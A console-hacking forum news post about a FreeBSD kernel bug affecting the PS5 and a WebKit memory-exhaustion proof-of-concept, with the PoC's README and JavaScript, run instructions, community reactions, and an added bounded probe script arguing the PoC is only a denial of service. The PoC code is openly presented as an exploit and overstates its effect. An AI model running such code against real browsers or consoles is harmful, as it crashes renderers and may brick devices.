Category: PS5 Jailbreaking | Thread starter: PSXHAX | Start date: Sep 10, 2024 at 5:30 PM | Replies: 16
Recently @zecoxao shared via an X post a FreeBSD kernel bug security advisory, confirming that the vulnerability works on the PlayStation 5. Alongside it came a WebKit "Memory Leak" Proof-of-Concept (PoC) test page (in practice a memory exhaustion test, per its own README) for WebKit browsers (PS4 / PS5, including Safari) by Debv on Github, aka idebty on X (DebTy's Ko-fi Page). Kameleonre_ on X notes that the FreeBSD bug has since been fixed upstream (CVE-2024-43102).

From the Github repository's README.md:

Memory Leak

Author: idebty
I'm self-taught and don't know anyone in the community. If you want to use this, use it, but credit me.

WebKit Memory Leak PoC

Description


This Proof of Concept (PoC) demonstrates a WebKit memory exhaustion exploit that I have been working on. The current iteration works but still needs to be fully exploited. Below is the JavaScript code that shows how it operates, along with explanations of each step.

How it Works

The code below follows five key steps:
  1. Heap Initialization: Allocates memory in a controlled manner.
  2. Heap Grooming: Manipulates memory to create gaps for the exploit.
  3. Memory Exhaustion: Continuously allocates and clears memory to exhaust resources.
  4. Payload Execution: Executes the payload to perform memory corruption.
  5. Exploit Execution: Runs the steps in sequence to trigger the memory exhaustion.
Code:
// Step 1: Initialize Controlled Memory
function initializeHeap() {
    //alert("Int heap");
    let buffers = [];
    for (let i = 0; i < 2048; i++) { // Reduced allocations
        buffers.push(new ArrayBuffer(500000)); // Smaller blocks of memory
    }
    return buffers;
}

// Step 2: Groom the Heap
function groomHeap() {
    //alert("groom heap");
    let tempArray = [];

    // Allocate and deallocate in patterns
    for (let i = 0; i < 2048; i++) { // Reduced iterations
        let buffer = new ArrayBuffer(1000); // Allocate smaller blocks
        tempArray.push(buffer);
    }

    // Deallocate some of the buffers to create holes in the heap
    for (let i = 0; i < 1512; i++) { // Fewer deallocations
        tempArray[i] = null; // Free up space to create holes in the heap
    }

    return tempArray;
}

// Step 3: Memory Exhaustion Function
function memExh() {
    let bufferArray = [];
    for (let i = 0; i < 2048; i++) { // Reduced iterations
        bufferArray.push(new ArrayBuffer(900000)); // Allocate smaller buffers
        if (bufferArray.length > 512) { // Less aggressive clearing
            bufferArray = []; // Clear buffer array to exhaust memory
        }
    }
}

// Step 4: The Exploit Payload Function
function payload() {
    let largeString = "B".repeat(900000); // Smaller initial string
    let obj = {};
    let iterationCount = 0; // Counter to track number of iterations

    while (true) {
        // String concatenation
        largeString += largeString;
        if (largeString.length > 100000000) { // Lower threshold for reset
            largeString = "B".repeat(900000); // Reset string to avoid overflow
        }
        memExh();
        iterationCount++;
        if (iterationCount > 64) break; // Control the number of iterations
    }
}

// Step 5: Perform the Exploit
function performExploit() {
    let controlledBuffers = initializeHeap(); // Initialize the heap
    let groomedHeap = groomHeap(); // Groom the heap
 
    // Start memory corruption
    memExh();

    // Run the payload
    payload();
}

performExploit();

Instructions
  1. Copy the above code and run it on an exploitable PS5 (works until, I guess, 9.60?). This might not be useful on PS4.
  2. Be mindful that this is a PoC and should be used for educational purposes only.
  3. Further testing is required to fully understand this vulnerability.
  4. Place your payload in the payload function.
Disclaimer

This PoC is for educational purposes only. The author is not responsible for any misuse of this code.

⚠️ I'm not liable for any damages caused by this PoC or any other use of it. This can brick, and might brick, your system if left unedited. ⚠️

A Message to Sony

Sony, I have reported this and got dismissed. I have provided enough proof, plus that unreleased PoC. It's not my fault that even after 6 months you didn't fix it; I have given you more than enough to fix this. This is to hopefully encourage you to fix it.

Heap Memory Exploit Code
Code:
function memmexh() {
    // Simulate allocation of an object
    let obj = { data: "important data" };

    // Reference to the object
    let ref = obj;

    // Simulate freeing the object (only this variable is cleared; ref still holds it)
    obj = null;
}

function ComplexOverflow() {
    let largeString = "A".repeat(1000000); // 1 million A's
    let bufferArray = [];
    let nestedArray = [];
    let obj = {};
    let counter = 0;
    let counterr = 0;

    while (true) {
        // String concatenation
        largeString += largeString;
        if (largeString.length > 100000000) {
            largeString = "A".repeat(1000000);
        }

        // Array buffer allocation
        bufferArray.push(new ArrayBuffer(1000000));
        if (bufferArray.length > 1000) {
            bufferArray = [];
        }

        // Nested arrays
        nestedArray.push([]);
        if (nestedArray.length > 1000) {
            nestedArray = [];
        }

        // Reload the page after 100 iterations
        counterr++;
        if (counterr >= 100) {
            location.reload();
        }

        // Object property expansion
        obj[counter] = "A".repeat(1000);
        counter++;
        if (counter > 10000000) {
            obj = {};
            counter = 0;
        }
    }
}

let MTestClassesArray = [];

class MTestClass {
    constructor() {}
}

// Expects an element with id="divMsg" on the hosting page
const create_1000_objects = () => {
    let counter = 0;
    memmexh();
    while (true) {
        // Simulate allocation of an object
        let obj = { data: "important data" };

        // Reference to the object
        let ref = obj;

        // Reload the page after 500 iterations
        counter++;
        if (counter >= 500) {
            location.reload();
        }

        // Allocate 1000 objects per iteration and keep them reachable
        for (let i = 0; i < 1000; i++) {
            MTestClassesArray.push(new MTestClass());
        }
        const text = `Total ${MTestClassesArray.length} MTestClass objects created`;
        document.getElementById('divMsg').innerHTML = text;
    }
}

Kameleonre_ on X notes, "Ok, the bugged code is not on FreeBSD 9.0, which means not valid for PS4, but it's on PS5. Thanks to SiSTR0 and iMrDJAi for pointing it out. This is the C code on FreeBSD 9.0; bug not there..." further stating, "But it's on the FreeBSD 11 branch [PS5]; this is the line which contains the bug."

According to notnotzecoxao on X, "also my friend said this should work on 1.xx and 2.xx as well as up until some of the most recent fws," while @CrazyVoid asks in an X post, "why does he not release his impl of the kernel bug? instead of making people recreate the work over again" as CrazyVoidPS4 then admits, "to be fair, specter enjoys working on things like that I think."

Shortly afterwards, idebty stated, "Someone modified my code; idk what he did, but he just made it trigger an error every time (a system error, at that). It seems like he's trying to make it copy a payload.bin. This might be a first for Sony: an exploit that releases for the latest firmware," with @SeregonWar on Github responding in an X post, "Hi! I am the creator of the fork! I don't know if the changes I made will work; I am trying to exploit the vulnerability somehow. Thanks for your work in finding the vulnerability!"

⬆️ Update: @zecoxao announced via X Post, "confirmed by @flatz that 8.00 patches this bug" going on to clarify, "the kernel bug, I might add" and then further elaborating, "to everyone that did not understand flatz's words: it's likely that sony never intended to fix this bug, and accidentally "fixed" it on 8.00 by patching syscall and libkernel access from the main contenders such as bluray java, webkit and ps2 games."

This PS5Scene news comes following the PS5 IPV6 Kernel Exploit v1.03, previous updates, PS4 v10.00-11.02 & PS5 v6.00-8.60 PoC Test, TheFlow0's Recent HackerOne Bug Report, PS4 / PS5 Semi-Permanent Exploits (WIP), PS5 Pro Tech Presentation by Mark Cerny and Sony's Official PS5 Pro Launch Date Announcement earlier on.
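The README above describes the PoC as a five-step memory exhaustion routine and then says the payload step "performs memory corruption". As an added check that is not part of DebTy's repository or this post, the block below runs bounded, instrumented versions of the same allocation patterns (ArrayBuffer churn, `s += s` string doubling, and the null-out "grooming" pass) and records how the engine actually responds. The function names, cap values and the 2^53 over-limit request are this example's own assumptions; the 2048/1512 counts are the ones used in the PoC's groomHeap(). It runs in a terminal JavaScript engine or a browser console without taking the tab down.

```javascript
// Added example (not from DebTy's repository or this post): an instrumented,
// bounded version of the PoC's allocation loops. Each probe stops at a cap or
// at the first RangeError and reports what happened, so you can see what the
// engine does under pressure: it refuses the allocation with a RangeError
// rather than corrupting memory. Cap values and names are assumptions.

// Allocate ArrayBuffers of chunkBytes until maxChunks are held or the engine
// refuses. Returns how many were held and whether a RangeError ended the run.
function probeArrayBuffers(chunkBytes, maxChunks) {
  const held = [];
  let error = null;
  for (let i = 0; i < maxChunks; i++) {
    try {
      held.push(new ArrayBuffer(chunkBytes));
    } catch (e) {
      error = e;
      break;
    }
  }
  const chunksHeld = held.length;
  held.length = 0; // drop references so the buffers become collectable
  return {
    chunksHeld,
    bytesRequested: chunksHeld * chunkBytes,
    refused: error instanceof RangeError,
    errorName: error === null ? null : error.name,
  };
}

// Double a string the way the PoC's payload() does ("s += s"), but stop at
// maxLength or at the engine's own string-length limit. Engines build the
// doubled string lazily (a rope), so the limit is reached without copying
// hundreds of megabytes first; the failure is again a RangeError.
function probeStringDoubling(seedLength, maxLength) {
  let s = "B".repeat(seedLength);
  let lastLength = s.length;
  let error = null;
  while (s.length * 2 <= maxLength) {
    try {
      s += s;
      lastLength = s.length;
    } catch (e) {
      error = e;
      break;
    }
  }
  return {
    lastLength,
    refused: error instanceof RangeError,
    errorName: error === null ? null : error.name,
  };
}

// The PoC's groomHeap() nulls out 1512 of 2048 slots. This shows what that
// leaves reachable (the remaining 536); the "holes" are simply unreachable
// objects the garbage collector may free at any time, nothing JavaScript
// can place or address.
function countReachableAfterGroom(total, freed) {
  const arr = [];
  for (let i = 0; i < total; i++) arr.push(new ArrayBuffer(16));
  for (let i = 0; i < freed; i++) arr[i] = null;
  return arr.filter((b) => b !== null).length;
}

// Usage: four small buffers succeed; a single over-limit request (2^53 bytes,
// above the ArrayBuffer length limit) is refused cleanly; string doubling
// stops at the engine's limit; grooming leaves 536 buffers reachable.
console.log(probeArrayBuffers(1 << 16, 4));
console.log(probeArrayBuffers(2 ** 53, 1));
console.log(probeStringDoubling(1 << 20, Infinity));
console.log(countReachableAfterGroom(2048, 1512));
```

The point of the probes is the shape of the failure: every loop in the PoC ends in a RangeError or an out-of-memory kill, which is a denial of service against the renderer, not a controlled memory corruption. Treat the WebKit page as a stress test, and keep the kernel bug (the CVE above) as the separate item that actually needs the patch.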

Related X Posts: [image: PS5 Vulnerable to FreeBSD Kernel Bug, WebKit Memory Leak PoC by DebTy]

Comments

This leaves a chance for the PS5 pro, of which we do not know the OFW version once it is taken out of its box. 9.60 maybe with luck
 